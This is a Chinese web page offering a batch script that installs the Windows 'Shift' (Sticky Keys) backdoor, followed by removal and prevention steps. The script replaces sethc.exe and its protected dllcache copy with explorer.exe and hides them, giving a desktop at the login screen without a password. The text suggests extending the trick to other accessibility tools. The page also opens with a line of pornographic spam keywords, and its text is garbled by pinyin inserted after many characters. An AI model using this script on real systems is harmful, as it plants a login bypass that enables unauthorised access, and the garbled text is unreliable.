亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

shift后門(mén)批處理代碼與shift后門(mén)清除方法分享

  發(fā)布時(shí)間:2011-04-07 01:17:57   作者:佚名   我要評(píng)論
shift后門(mén)腳本代碼及shift后門(mén)清除方法,有服務(wù)器的朋友可以測(cè)試下。一定要關(guān)閉這個(gè)功能。
在cmd下輸入以下命令...
下面再打開(kāi)記事本把底下的代碼粘貼進(jìn)去。

復(fù)制代碼
代碼如下:

@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后門(mén)
echo.sproink
@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
echo 使用方法:本文件執(zhí)行完畢后,
echo 在終端界面按Shift 5次即可登陸系統(tǒng)!
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后門(mén)安裝完畢!
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit

其實(shí)原理很簡(jiǎn)單,就是利用了explorer.exe 這個(gè)資源管理器進(jìn)程替換調(diào)用的shift 默認(rèn)啟動(dòng)程序,然后還覆蓋了windows的文件保護(hù)原文件(防止文件保護(hù)系統(tǒng)檢測(cè)到文件修改,會(huì)還原這些原來(lái)的程序,造成copy文件失去作用),當(dāng)調(diào)用shift是其實(shí)調(diào)用的真正程序是桌面進(jìn)程。Lyon: 同理,你也可以利用此方法替換屏幕鍵盤(pán)及放大鏡和組合鍵:win+u,其它自己可以拓展思路^_^
下面介紹如何清除此后門(mén)...
打開(kāi)控制面板--輔助功能選項(xiàng)--粘滯鍵--設(shè)置--去掉使用快捷鍵的勾

還有要改下copy.exe的權(quán)限,不過(guò)在這里推薦大家把c盤(pán)所有的程序都 改下,只有administrator才能訪問(wèn)

shift后門(mén)的預(yù)防解決辦法:預(yù)防很簡(jiǎn)單的,連敲5次shift,然后在彈出的設(shè)置里面取消連滯鍵
已經(jīng)中了的話
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷貝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目錄下;拷貝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目錄下
還有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用戶權(quán)限或拒絕訪問(wèn)等,也可:)建議利用前者恢復(fù)。。。
收工!

相關(guān)文章

最新評(píng)論